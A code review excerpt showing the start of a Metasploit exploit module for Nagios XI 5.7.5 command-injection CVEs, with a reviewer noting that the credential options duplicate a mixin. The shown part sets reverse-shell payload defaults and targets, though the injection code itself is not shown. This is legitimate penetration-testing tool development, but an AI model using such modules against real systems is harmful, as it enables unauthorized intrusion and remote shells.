modules/exploits/linux/http/nagios_xi_configwizards_authenticated_rce.rb

```diff
@@ -0,0 +1,195 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::Remote::HTTP::NagiosXi
+  include Msf::Exploit::CmdStager
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Nagios XI 5.7.5 - ConfigWizards Authenticated Remote Code Exection',
+        'Description' => %q{
+          This module exploits CVE-2021-25296, CVE-2021-25297, or CVE-2021-25298,
+          OS command injection vulnerabilities in several URL parameters that enables
+          an authenticated user to perform remote code execution on Nagios XI 5.7.5 as
+          the apache user.
+
+          Valid credentials for a Nagios XI user are required. This module has
+          been successfully tested against the official NagiosXI 5.7.5 OVA.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'Matthew Mathur'
+        ],
+        'References' => [
+          ['CVE', '2021-25296'],
+          ['CVE', '2021-25297'],
+          ['CVE', '2021-25298']
+        ],
+        'Platform' => %w[linux unix],
+        'Arch' => [ ARCH_X86, ARCH_X64, ARCH_CMD ],
+        'Targets' => [
+          [
+            'Linux (x86/x64)', {
+              'Arch' => [ ARCH_X86, ARCH_X64 ],
+              'Platform' => 'linux',
+              'DefaultOptions' => { 'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp' }
+            }
+          ],
+          [
+            'CMD', {
+              'Arch' => [ ARCH_CMD ],
+              'Platform' => 'unix',
+              # the only reliable payloads against a typical Nagios XI host (CentOS 7 minimal) seem to be cmd/unix/reverse_perl_ssl and cmd/unix/reverse_openssl
+              'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_perl_ssl' }
+            }
+          ]
+        ],
+        'Privileged' => false,
+        'DefaultTarget' => 1,
+        'DisclosureDate' => '2021-02-13',
+        'Notes' => {
+          'Stability' => [ CRASH_SAFE ],
+          'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],
+          'Reliability' => [ REPEATABLE_SESSION ]
+        }
+      )
+    )
+
+    register_options [
+      OptString.new('USERNAME', [true, 'Username to authenticate with', 'nagiosadmin']),
+      OptString.new('PASSWORD', [true, 'Password to authenticate with', nil]),
```

Comment:
These are already provided by the `NagiosXI` mixin your importing and are actually defined pretty much exactly the same. There is no need to redefine them here.